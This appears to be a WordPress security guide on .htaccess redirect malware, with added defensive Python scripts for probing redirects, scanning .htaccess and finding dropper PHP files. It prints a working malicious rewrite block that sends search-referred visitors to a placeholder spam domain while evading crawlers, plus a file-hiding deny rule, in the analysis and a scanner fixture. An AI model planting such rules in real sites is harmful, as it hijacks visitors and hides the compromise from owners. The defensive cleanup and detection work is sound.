My WordPress Site is Redirecting to Spam! Understanding .htaccess Redirect Malware
Imagine this scenario: A visitor clicks a link to your WordPress site from Google. Instead of seeing your homepage, their browser flickers, and suddenly they land on a shady website selling pharmaceuticals, cryptocurrency scams, or adult content.
Yet, when you type your URL directly into your browser, the site looks fine. What is going on?
You are likely the victim of a sophisticated attack known as .htaccess redirect malware. It is one of the most frustrating and damaging forms of WordPress hacks because it is designed to be invisible to site owners while hijacking your valuable SEO traffic.
In this article, we will explain how this malware uses your server against you, why it’s so sneaky, and how to stop the redirects for good.
What is .htaccess Redirect Malware?
Your .htaccess file is a powerful configuration file located in the root directory of your WordPress installation. It runs on Apache web servers and acts like a traffic controller. Normally, WordPress uses it to manage pretty permalinks.
When hackers compromise a site, the .htaccess file is their primary target. By injecting malicious rules into this file, they can instruct your server to intercept incoming visitors and immediately send them elsewhere. They are essentially bribing the traffic controller to send your visitors down a dark alley.
The Sneaky Part: Conditional Redirects
Many site owners ask: “If my site is infected, why can I still access it normally?”
Modern WordPress malware is smart. Hackers know that if you see your site redirecting to spam, you will fix it immediately. To keep the hack running longer, they use conditional redirects.
The malware checks who the visitor is before redirecting them. It looks at the “User-Agent” (what browser or device they are using) and the “Referer” (where they came from).
Common malicious conditions include:
- Mobile-Only Redirects: The hack only triggers if the visitor is on an iPhone or Android device. Desktop users see the normal site.
- Search Engine Redirects: The hack only triggers if the visitor clicked a link on Google, Bing, or Yahoo. Typing your URL directly works fine.
- Bot Detection: The malware tries to hide from security crawlers and search engine bots to avoid detection by Google Search Console.
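The conditions listed above can be checked from the outside. The following script is an added example, not code from the original article: it requests your own site under a few visitor profiles (a direct desktop visit, an iPhone arriving from Google, a desktop arriving from Bing) with redirect-following disabled, so a conditional redirect shows up as a 3xx status with an off-site Location header instead of being followed silently. The header profiles, the finding names and the www-stripping host comparison are this example's own choices.

```python
# Added example, not code from the original article: request your own site
# the way the malware's conditions expect (search-engine referer, mobile
# User-Agent) with redirects disabled, so a conditional redirect shows up as
# a 3xx status with an off-site Location header instead of silently being
# followed. Header profiles and the hostname normalisation are assumptions.
import sys
import urllib.error
import urllib.request
from urllib.parse import urlparse

# Constructed visitor profiles: the first is what a site owner typing the URL
# looks like, the others match the conditions described above.
PROFILES = {
    "desktop-direct": {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/120.0",
    },
    "iphone-from-google": {
        "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) Safari/604.1",
        "Referer": "https://www.google.com/",
    },
    "desktop-from-bing": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0",
        "Referer": "https://www.bing.com/",
    },
}

REDIRECT_CODES = {301, 302, 303, 307, 308}


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so we can inspect the 3xx ourselves."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # urllib then raises HTTPError carrying the response


def _bare_host(host):
    host = (host or "").lower()
    return host[4:] if host.startswith("www.") else host


def classify(status, location, site_host):
    """Return 'ok', 'same-site-redirect' or 'offsite-redirect' for one response.
    A redirect between the www. and bare forms of your own host counts as same-site."""
    if status not in REDIRECT_CODES or not location:
        return "ok"
    target = urlparse(location).hostname
    if target is None or _bare_host(target) == _bare_host(site_host):
        return "same-site-redirect"      # relative Location, or our own host
    return "offsite-redirect"


def probe(url, headers, timeout=10):
    """Fetch url once with the given headers; return (status, Location or None)."""
    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(url, headers=headers)
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:  # 3xx lands here because of NoRedirect
        return err.code, err.headers.get("Location")


def probe_site(url):
    """Probe url under every profile; returns {profile: (status, location, verdict)}."""
    site_host = urlparse(url).hostname or ""
    results = {}
    for name, headers in PROFILES.items():
        status, location = probe(url, headers)
        results[name] = (status, location, classify(status, location, site_host))
    return results


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: probe_redirects.py https://your-site.example/")
    for name, (status, location, verdict) in probe_site(sys.argv[1]).items():
        print(f"{name:20} {status:3} {verdict:20} {location or ''}")
```

Run it from a machine outside your hosting network. A `desktop-direct` row that says `ok` next to an `iphone-from-google` row that says `offsite-redirect` is exactly the conditional pattern the article describes. A clean result is not proof of a clean site, since some variants also key on the visitor's IP address or only fire once per visitor.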
Analyzing the Malicious Code
If you open an infected .htaccess file via FTP or cPanel, you will often find large blocks of code inserted at the very top, before the # BEGIN WordPress comment line.
Here is an example of what conditional .htaccess redirect malware looks like. Notice how it checks for specific conditions before executing the redirect rule.
<IfModule mod_rewrite.c>
RewriteEngine On
# Check if the visitor is coming from a major search engine
RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo|yandex).*$ [NC]
# AND check if the visitor is NOT a known bot/crawler
RewriteCond %{HTTP_USER_AGENT} !(googlebot|bingbot|slurp|duckduckbot) [NC]
# If conditions met, redirect to the spam domain
RewriteRule ^(.*)$ http://malicious-spam-domain.com/$1 [L,R=302]
</IfModule>
Another common tactic is to block access to the file itself, making it hard for security plugins to scan it:
<Files .htaccess>
order allow,deny
deny from all
</Files>
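The patterns in the two snippets above are easy to check for mechanically. The scanner below is an added example, not code from the original article: it reads an .htaccess file and flags a RewriteRule that sends visitors to another host (together with the visitor-specific variables its RewriteCond lines test), a `<Files .htaccess>` block that denies access, and any directives that sit before the `# BEGIN WordPress` marker. The embedded sample is constructed from the article's example (the spam hostname is the article's placeholder, not a real indicator), and the `own_hosts` argument and finding names are this example's own conventions.

```python
# Added example, not code from the original article: parse an .htaccess file
# and flag the three patterns described above (visitor-conditioned redirect
# to another host, a <Files .htaccess> deny block, directives placed before
# "# BEGIN WordPress"). The own_hosts argument and the finding names are
# this example's own conventions.
import re
from urllib.parse import urlparse

# Constructed sample modelled on the infected file shown above; the spam
# host is the article's placeholder, not a real indicator.
SAMPLE_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo|yandex).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !(googlebot|bingbot|slurp|duckduckbot) [NC]
RewriteRule ^(.*)$ http://malicious-spam-domain.com/$1 [L,R=302]
</IfModule>
<Files .htaccess>
order allow,deny
deny from all
</Files>
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

VISITOR_VARS = {"HTTP_REFERER", "HTTP_USER_AGENT"}
COND_RE = re.compile(r"RewriteCond\s+%\{(\w+)\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"RewriteRule\s+(\S+)\s+(\S+)", re.I)
FILES_HT_RE = re.compile(r"<Files\s+\.htaccess\s*>", re.I)
DENY_RE = re.compile(r"^deny\s+from\s+all$", re.I)


def _bare_host(host):
    host = (host or "").lower()
    return host[4:] if host.startswith("www.") else host


def analyze_htaccess(text, own_hosts):
    """Return a list of findings, each {"kind", "line", "detail"}."""
    own = {_bare_host(h) for h in own_hosts}
    findings = []
    conds = []          # RewriteCond lines apply only to the next RewriteRule
    in_files_block = False
    before_wp = []      # directive line numbers seen before "# BEGIN WordPress"
    seen_wp = False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.lower() == "# begin wordpress":
                seen_wp = True
            continue
        if not seen_wp:
            before_wp.append(lineno)
        m = COND_RE.match(line)
        if m:
            conds.append((m.group(1).upper(), m.group(2)))
            continue
        m = RULE_RE.match(line)
        if m:
            target = urlparse(m.group(2))
            host = _bare_host(target.hostname)
            if target.scheme in ("http", "https") and host and host not in own:
                findings.append({
                    "kind": "offsite-redirect", "line": lineno,
                    "detail": {"host": host,
                               "conditioned_on": sorted({v for v, _ in conds if v in VISITOR_VARS})},
                })
            conds = []  # consumed by this rule
            continue
        if FILES_HT_RE.match(line):
            in_files_block = True
        elif line.lower() == "</files>":
            in_files_block = False
        elif in_files_block and DENY_RE.match(line):
            # Also used by legitimate hardening, so this is context, not proof.
            findings.append({"kind": "htaccess-deny-block", "line": lineno, "detail": None})
    if before_wp:
        findings.append({"kind": "directives-before-wordpress-block",
                         "line": before_wp[0], "detail": {"count": len(before_wp)}})
    return findings


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HTACCESS
    for f in analyze_htaccess(text, ["example.com"]):
        print(f"line {f['line']:>3}: {f['kind']}  {f['detail'] or ''}")
```

Pass every hostname your site legitimately answers on in `own_hosts`, otherwise an ordinary canonical-domain redirect is reported as off-site. The `<Files .htaccess>` finding is deliberately informational: hosting providers and hardening plugins add the same block, so it only matters when it appears together with the redirect finding.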
The “Whack-a-Mole” Problem: The Dropper Script
The most infuriating part of .htaccess redirect malware is that it often comes back minutes after you fix it.
You delete the malicious code, save the file, and your site works again. Ten minutes later, the redirects are back. Why?
Because the infection is not just in the .htaccess file. The modified .htaccess is just the symptom. The disease is a separate PHP file hidden somewhere else on your server, known as a “dropper” or “regenerator” script.
This hidden script runs periodically (often triggered by normal site traffic or a cron job). Its entire job is to check if the .htaccess file is “clean,” and if so, re-inject the malicious redirect code. Until you find and delete the dropper script, the problem will never go away.
How to Fix the Issue Permanently
Cleaning up a redirect hack requires a systematic approach.
1. The Immediate Fix (Stop the Bleeding)
Access your server via FTP or cPanel File Manager. Locate the .htaccess file in your root directory (usually public_html). Edit the file and delete the suspicious code blocks at the top. Ensure only the default WordPress rules remain.
2. Change File Permissions
To temporarily stop the dropper script from editing the file again, change the permissions of the .htaccess file to “444” (read-only). Note that this will also prevent WordPress from updating your permalinks.
3. Hunt for the Dropper
This is the hardest part. You need a deep server scan. Use high-quality security plugins like Wordfence or Sucuri to scan core files for modifications. Look for recently modified PHP files in your /wp-content/uploads/ folder or strangely named files in your root directory (e.g., radio.php, input.php, wp-info.php).
4. Check Cron Jobs
Check your hosting control panel for any suspicious Cron Jobs that might be triggering the re-infection script.
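Steps 2 and 3 above can be scripted. The helpers below are an added example, not code from the original article: `lock_htaccess()` backs the file up and sets it read-only, and `suspicious_php()` lists PHP files that have no business where they are (any PHP under wp-content/uploads, a non-core PHP file in the site root, and recently modified PHP elsewhere). Both only report; nothing is deleted. The WordPress directory layout is the standard one, and the core-file list, the 30-day threshold and the throwaway demo tree (planted files named after the article's examples, radio.php and wp-info.php) are this example's own.

```python
# Added example, not code from the original article: helpers for steps 2
# and 3 above. lock_htaccess() backs up and read-only-locks .htaccess;
# suspicious_php() lists PHP files that have no business where they are.
# It reports and never deletes. The directory layout is the standard
# WordPress one; the core-file list and thresholds are this example's.
import os
import shutil
import stat
import tempfile
import time

# PHP files that belong in the root of a standard WordPress install.
CORE_ROOT_PHP = {
    "index.php", "wp-activate.php", "wp-blog-header.php", "wp-comments-post.php",
    "wp-config.php", "wp-config-sample.php", "wp-cron.php", "wp-links-opml.php",
    "wp-load.php", "wp-login.php", "wp-mail.php", "wp-settings.php",
    "wp-signup.php", "wp-trackback.php", "xmlrpc.php",
}


def lock_htaccess(root):
    """Step 2: copy .htaccess to .htaccess.bak, then chmod 444. Returns the new mode."""
    path = os.path.join(root, ".htaccess")
    shutil.copy2(path, path + ".bak")
    os.chmod(path, 0o444)
    return stat.S_IMODE(os.stat(path).st_mode)


def suspicious_php(root, max_age_days=30):
    """Step 3: return sorted (relative_path, reason) pairs for
    - any .php under wp-content/uploads (uploads should hold media, never code),
    - a .php in the site root that is not a core WordPress file,
    - any other .php modified in the last max_age_days (noisy right after an
      update, and mtimes can be reset by an attacker, so absence proves nothing)."""
    cutoff = time.time() - max_age_days * 86400
    uploads = os.path.join(root, "wp-content", "uploads") + os.sep
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if full.startswith(uploads):
                hits.append((rel, "php-in-uploads"))
            elif dirpath == root and name not in CORE_ROOT_PHP:
                hits.append((rel, "unknown-root-php"))
            elif os.path.getmtime(full) >= cutoff:
                hits.append((rel, "recently-modified"))
    return sorted(hits)


def _write(path, text, mtime=None):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)
    if mtime is not None:
        os.utime(path, (mtime, mtime))


def build_demo_site(root):
    """Constructed fixture: a skeleton WordPress tree with two planted files,
    named after the examples the article gives (radio.php, wp-info.php)."""
    old = time.time() - 400 * 86400          # untouched for over a year
    for name in ("index.php", "wp-login.php", "wp-config.php"):
        _write(os.path.join(root, name), "<?php // core\n", old)
    _write(os.path.join(root, "wp-includes", "class-wp.php"), "<?php // core\n", old)
    _write(os.path.join(root, ".htaccess"), "# BEGIN WordPress\n# END WordPress\n")
    _write(os.path.join(root, "wp-content", "uploads", "2024", "01", "radio.php"),
           "<?php // planted\n")
    _write(os.path.join(root, "wp-info.php"), "<?php // planted\n")


def demo():
    """Run both helpers on a throwaway tree; returns (htaccess_mode, findings)."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    try:
        build_demo_site(root)
        return lock_htaccess(root), suspicious_php(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    mode, findings = demo()
    print(f".htaccess mode: {mode:o}")
    for reason, rel in ((r, p) for p, r in findings):
        print(f"{reason:18} {rel}")
```

Point `suspicious_php()` at your real document root (usually public_html) to get the list worth opening by hand. Treat the 444 lock as a speed bump only: a dropper running as the same system user that owns the file can chmod it back before rewriting it, which is why finding and removing the script itself is the step that actually ends the cycle.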
Conclusion
.htaccess redirect malware is a serious threat to your site’s reputation and SEO rankings. Because it hides from site owners using conditional logic, it can go unnoticed for weeks. If your visitors are complaining about spam redirects, don’t ignore them—act immediately to clean your server and lock down your security.